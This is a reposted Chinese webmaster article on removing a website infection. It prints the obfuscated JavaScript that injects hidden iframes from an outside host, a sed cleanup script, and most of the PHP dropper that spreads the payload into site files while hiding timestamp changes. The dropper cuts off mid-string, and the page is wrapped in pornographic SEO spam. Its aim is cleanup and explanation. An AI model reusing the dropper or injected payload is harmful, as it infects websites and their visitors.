国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 網站 > 建站經驗 > 正文

用shell命令刪除網站最新nb掛馬的方法與代碼

2019-11-02 16:26:03
字體:
來源:轉載
供稿:網友
復制代碼 代碼如下:

# <script language="javascript" type="text/javascript">

# if(document.cookie.indexOf('helio')==-1){var expires=new Date();expires.setTime(expires.getTime()+1*60*60*1000);document.cookie='helio=Yes;path=/;expires='+expires.toGMTString()

# eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('5.l(/'<h f=b i=8://m.n.6.4/a/j.d></h><9 7=0 k=1 i="8://m.n.6.4/a/e.c?2"></9><9 7=0 k=1 i="8://m.n.6.4/a/g.c?3"></9>/')',62,24,'|100|YNE|ZGH|cn|document|gov|height|http|iframe|images|javascript|jpg|js|kiss|language|miss|script|src|ubb|width|writeln|www|xcrsrc'.split('|'),0,{}));}

# </script>

確實很讓人頭痛,還是編寫shell 腳本把這些腳本去掉

復制代碼 代碼如下:

#!/bin/sh

ls $1/*.htm | while read file

do

sed -i -e "/if(document.cookie.indexOf('helio'/d; /eval(function(p,a,c,k,e,d)/d;" $file

done

但是第二天還是有

最后偶然發現 網站中有個auto.php 文件比較可疑

查看下內容,果然是木馬的根源

下面是其內容,希望對大家有所幫助

復制代碼 代碼如下:

<?php

error_reporting(E_ERROR);

set_time_limit(0);

function CheckPath($path)

{

return str_replace('//','/',str_replace('//','/',$path));

}

function AutoRead($filename)

{

$handle = @fopen($filename,"rb");

$filecode = @fread($handle,@filesize($filename));

@fclose($handle);

return $filecode;

}

function AutoWrite($filename, $filecode ,$filemode)

{

$time = @filemtime($filename);

$handle = @fopen($filename,$filemode);

$key = @fwrite($handle,"/r/n".$filecode."/r/n");

if(!$key)

{

@chmod($filename,0666);

$key = @fwrite($handle,"/r/n".$filecode."/r/n");

}

@fclose($handle);

@touch($filename,$time);

return $key ? true : false;

}

function make_pass($length)

{

$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";

$str = "";

while(strlen($str) < $length)

{

$str .= substr($possible,(rand() % strlen($possible)),1);

}

return $str;

}

function AutoRun($dir)

{

$spider = @opendir($dir);

while($file = @readdir($spider))

{

if($file == '.' || $file == '..' || $file == 'a' || $file == 'images' || $file == 'uploads' || $file == 'special' || $file == 'data' || $file == 'include' || $file == 'member' || $file == 'templets' || $file == 'install') continue;

$code = base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCmlmKGRvY3VtZW50LmNvb2tpZS5pbmRleE9mKCdoZWxpbycpPT0tMSl7dmFyIGV4cGlyZXM9bmV3IERhdGUoKTtleHBpcmVzLnNldFRpbWUoZXhwaXJlcy5nZXRUaW1lKCkrMSo2MCo2MCoxMDAwKTtkb2N1bWVudC5jb29raWU9J2hlbGlvPVllcztwYXRoPS87ZXhwaXJlcz0nK2V4cGlyZXMudG9HTVRTdHJpbmcoKQ0KZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUocGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKWRbZShjKV09a1tjXXx8ZShjKTtrPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKWlmKGtbY10pcD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSk7cmV0dXJuIHB9KCc1LmwoXCc8aCBmPWIgaT04Oi8vbS5uLjYuNC9hL2ouZD48L2g+PDkgNz0wIGs9MSBpPSI4Oi8vbS5uLjYuNC9hL2UuYz8yIj48Lzk+PDkgNz0wIGs9MSBpPSI4Oi8vbS5uLjYuNC9hL2cuYz8zIj48Lzk+XCcpJyw2MiwyNCwnfDEwMHw=');
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 揭阳市| 修水县| 阿拉善盟| 分宜县| 合川市| 翁牛特旗| 晋城| 威宁| 星子县| 南宫市| 渝北区| 四会市| 雷波县| 分宜县| 游戏| 仁寿县| 昆山市| 三台县| 赣州市| 津市市| 嵊州市| 九江县| 西充县| 古蔺县| 静乐县| 新津县| 永泰县| 兰溪市| 清丰县| 临桂县| 正安县| 怀集县| 临朐县| 通州区| 南昌县| 新乡市| 威海市| 滨州市| 陆良县| 北海市| 夏邑县|